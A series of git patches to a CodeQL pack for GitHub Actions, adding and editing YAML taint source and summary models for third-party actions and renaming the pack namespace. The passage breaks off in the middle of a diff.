+extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml new file mode 100644 index 00000000000..d95c69bc5b1 --- /dev/null +++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "issue_comment", ""] + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "pull_request_comment", ""] \ No newline at end of file diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml new file mode 100644 index 00000000000..3c60de5bb0a --- /dev/null +++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint"] diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index 46a577d2f7e..8358159bd40 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: summaryModel data: - - ["mad9000/actions-find-and-replace-string", "*", "source", "value", "taint"] - - ["mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint"] \ No newline at end of file + - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint"] + - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml new file mode 100644 index 00000000000..54302b86e83 --- /dev/null +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint"] + - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml new file mode 100644 index 00000000000..7904383d707 --- /dev/null +++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint"] diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml new file mode 100644 index 00000000000..0c283016c86 --- /dev/null +++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml new file mode 100644 index 00000000000..2694ec2c453 --- /dev/null +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml new file mode 100644 index 00000000000..aee6172b591 --- /dev/null +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml new file mode 100644 index 00000000000..2167b16c7ba --- /dev/null +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint"] diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml new file mode 100644 index 00000000000..d90d7109fc2 --- /dev/null +++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint"] diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml new file mode 100644 index 00000000000..20a412fd9b7 --- /dev/null +++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint"] diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml new file mode 100644 index 00000000000..8d0731c9792 --- /dev/null +++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint"] diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml new file mode 100644 index 00000000000..9364fd74752 --- /dev/null +++ b/ql/lib/ext/timheuer_base64-to-file.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint"] + - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml new file mode 100644 index 00000000000..f16b69c7af9 --- /dev/null +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - ["tzkhan/pr-update-action", "*", "output.headMatch", "pull_request_target", ""] diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml new file mode 100644 index 00000000000..59a4c5b5652 --- /dev/null +++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - ["xt0rted/slash-command-action", "*", "output.command-arguments", "issue_comment", ""] + - ["xt0rted/slash-command-action", "*", "output.command-arguments", "pull_request_comment", ""] From a28f8e90f071c29067eb4fa51a88a25e85dd57b1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 21 Feb 2024 16:50:33 +0100 Subject: [PATCH 0066/1267] Update ql/lib/ext/tj-actions_branch-names.model.yml --- ql/lib/ext/tj-actions_branch-names.model.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml index 20383f415c2..1618eddf2d8 100644 --- a/ql/lib/ext/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -4,7 +4,6 @@ extensions: extensible: sourceModel data: # https://github.com/tj-actions/branch-names - - ["tj-actions/branch-names", "*", "output.base_ref_branch", "pull_request_target", "PR base branch"] - ["tj-actions/branch-names", "*", "output.current_branch", "pull_request_target", "PR current branch"] - ["tj-actions/branch-names", "*", "output.head_ref_branch", "pull_request_target", "PR head branch"] - ["tj-actions/branch-names", "*", "output.ref_branch", "pull_request_target", "Branch tirggering workflow run"] From 3d5567d6988c4e4197014a2111393f003842b466 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 21 Feb 2024 16:50:44 +0100 Subject: [PATCH 0067/1267] Update ql/lib/codeql/actions/Ast.qll Co-authored-by: Jorge <46056498+jorgectf@users.noreply.github.com> --- ql/lib/codeql/actions/Ast.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 2e93187b6bf..8f04005be8f 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -23,7 +23,7 @@ class AstNode instanceof YamlNode { class Statement extends AstNode { /** Gets the workflow that this job is a part of. */ WorkflowStmt getEnclosingWorkflowStmt() { - exists(WorkflowStmt w | w.getAChildNode*() = this and result = w) + this = result.getAChildNode*() } } From 9e2be7d67445a3f9ff64ae614ac689b4dabb5b77 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Wed, 21 Feb 2024 17:27:39 +0100 Subject: [PATCH 0068/1267] Apply suggestions from code review MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Alvaro Muñoz --- ql/lib/ext/franzdiebold_github-env-vars-action.model.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index 8475cb66c02..c08e6f1b396 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "pull_request", "PR body"] - - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "pull_request", "PR title"] + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "pull_request_target", "PR body"] + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "pull_request_target", "PR title"] From d0b904a5907e7a1369de76723db344bf18381270 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 21 Feb 2024 21:57:45 +0100 Subject: [PATCH 0069/1267] Fix QLpack names --- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 2 +- ql/lib/ext/android-actions_setup-android.model.yml | 4 ++-- ql/lib/ext/apple-actions_import-codesign-certs.model.yml | 4 ++-- ql/lib/ext/ashley-taylor_read-json-property-action.model.yml | 4 ++-- ql/lib/ext/ashley-taylor_regex-property-action.model.yml | 4 ++-- ql/lib/ext/aszc_change-string-case-action.model.yml | 2 +- ql/lib/ext/aws-actions_configure-aws-credentials.model.yml | 2 +- ql/lib/ext/bobheadxi_deployments.model.yml | 4 ++-- ql/lib/ext/bufbuild_buf-breaking-action.model.yml | 4 ++-- ql/lib/ext/bufbuild_buf-lint-action.model.yml | 4 ++-- ql/lib/ext/cachix_cachix-action.model.yml | 4 ++-- ql/lib/ext/coursier_cache-action.model.yml | 4 ++-- ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml | 4 ++-- ql/lib/ext/csexton_release-asset-action.model.yml | 2 +- ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ql/lib/ext/franzdiebold_github-env-vars-action.model.yml | 2 +- ql/lib/ext/game-ci_unity-test-runner.model.yml | 2 +- ql/lib/ext/getsentry_action-release.model.yml | 4 ++-- ql/lib/ext/github_codeql-action.model.yml | 2 +- ql/lib/ext/gradle_gradle-build-action.model.yml | 4 ++-- ql/lib/ext/haya14busa_action-cond.model.yml | 4 ++-- ql/lib/ext/hexlet_project-action.model.yml | 2 +- ql/lib/ext/jsdaniell_create-json.model.yml | 4 ++-- ql/lib/ext/jwalton_gh-ecr-push.model.yml | 4 ++-- ql/lib/ext/khan_pull-request-comment-trigger.model.yml | 4 ++-- .../larsoner_circleci-artifacts-redirector-action.model.yml | 2 +- ql/lib/ext/mattdavis0351_actions.model.yml | 4 ++-- ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml | 2 +- ql/lib/ext/mishakav_pytest-coverage-comment.model.yml | 2 +- ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 2 +- ql/lib/ext/ruby_setup-ruby.model.yml | 2 +- .../ext/salsify_action-detect-and-tag-new-version.model.yml | 2 +- ql/lib/ext/shallwefootball_upload-s3-action.model.yml | 2 +- ql/lib/ext/shogo82148_actions-setup-perl.model.yml | 2 +- ql/lib/ext/suisei-cn_actions-download-file.model.yml | 2 +- ql/lib/ext/timheuer_base64-to-file.model.yml | 4 ++-- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- ql/lib/ext/xt0rted_slash-command-action.model.yml | 2 +- 38 files changed, 56 insertions(+), 56 deletions(-) diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index 73e49a1fb06..f370a9fe222 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint"] diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml index 11ea0ae7922..5ecd36f0926 100644 --- a/ql/lib/ext/android-actions_setup-android.model.yml +++ b/ql/lib/ext/android-actions_setup-android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint"] \ No newline at end of file + - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint"] diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml index 2fdf6c78d53..b81f5c17ca2 100644 --- a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml +++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint"] \ No newline at end of file + - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint"] diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml index fb837050879..5ab9fee1667 100644 --- a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint"] \ No newline at end of file + - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint"] diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml index d3b929956d1..a6e1364d218 100644 --- a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint"] - - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint"] \ No newline at end of file + - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint"] diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml index f4527cf1b7f..cfdbb0b825f 100644 --- a/ql/lib/ext/aszc_change-string-case-action.model.yml +++ b/ql/lib/ext/aszc_change-string-case-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint"] diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml index f9510094295..26b3a1fd3df 100644 --- a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml +++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint"] diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml index a458e229e04..2d8932d87fb 100644 --- a/ql/lib/ext/bobheadxi_deployments.model.yml +++ b/ql/lib/ext/bobheadxi_deployments.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint"] \ No newline at end of file + - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index a6cfbb6ee9e..ee8e6abef09 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] \ No newline at end of file + - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index 9fb754ea9e1..c58b5a1e1d2 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] \ No newline at end of file + - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index bd9563317fb..1c6584eb9d5 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"] \ No newline at end of file + - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"] diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml index 951a297207d..bfb45dddb66 100644 --- a/ql/lib/ext/coursier_cache-action.model.yml +++ b/ql/lib/ext/coursier_cache-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint"] \ No newline at end of file + - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index ab6458028a5..d4e35196c6c 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] \ No newline at end of file + - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml index 084e3328dc8..60e35e66a4d 100644 --- a/ql/lib/ext/csexton_release-asset-action.model.yml +++ b/ql/lib/ext/csexton_release-asset-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index b2872259fe9..2aa6013c872 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index c08e6f1b396..ffde7dc6a91 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "pull_request_target", "PR body"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index a0d4b357b5a..ab413b6e975 100644 --- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml index d416a71c91d..e6688f3805d 100644 --- a/ql/lib/ext/getsentry_action-release.model.yml +++ b/ql/lib/ext/getsentry_action-release.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["getsentry/action-release", "*", "input.version", "output.version", "taint"] - - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint"] \ No newline at end of file + - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint"] diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml index 3710f7e07b8..b214178350c 100644 --- a/ql/lib/ext/github_codeql-action.model.yml +++ b/ql/lib/ext/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint"] diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml index 6ea8a6c6800..0534d299627 100644 --- a/ql/lib/ext/gradle_gradle-build-action.model.yml +++ b/ql/lib/ext/gradle_gradle-build-action.model.yml @@ -1,8 +1,8 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint"] - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint"] - - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-url", "env.BUILD_SCAN_TERMS_OF_SERVICE_URL", "taint"] \ No newline at end of file + - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-url", "env.BUILD_SCAN_TERMS_OF_SERVICE_URL", "taint"] diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml index f0e0752b735..a8a528b85c5 100644 --- a/ql/lib/ext/haya14busa_action-cond.model.yml +++ b/ql/lib/ext/haya14busa_action-cond.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint"] - - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint"] \ No newline at end of file + - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint"] diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml index 4499d91cab6..6a907fcc3a1 100644 --- a/ql/lib/ext/hexlet_project-action.model.yml +++ b/ql/lib/ext/hexlet_project-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint"] diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml index a0f59b9e38b..f1a04c9e244 100644 --- a/ql/lib/ext/jsdaniell_create-json.model.yml +++ b/ql/lib/ext/jsdaniell_create-json.model.yml @@ -1,8 +1,8 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint"] - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint"] - - ["jsdaniell/create-json", "*", "input.dir", "output.successfully", "taint"] \ No newline at end of file + - ["jsdaniell/create-json", "*", "input.dir", "output.successfully", "taint"] diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index 8ae3bb0035d..b237ac313d2 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"] \ No newline at end of file + - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"] diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml index d95c69bc5b1..b872bbe2ed0 100644 --- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml +++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "issue_comment", ""] - - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "pull_request_comment", ""] \ No newline at end of file + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "pull_request_comment", ""] diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml index 3c60de5bb0a..abfca93b4ec 100644 --- a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml +++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint"] diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml index 54302b86e83..91741f58706 100644 --- a/ql/lib/ext/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint"] - - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"] \ No newline at end of file + - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"] diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml index 7904383d707..dfa441761ab 100644 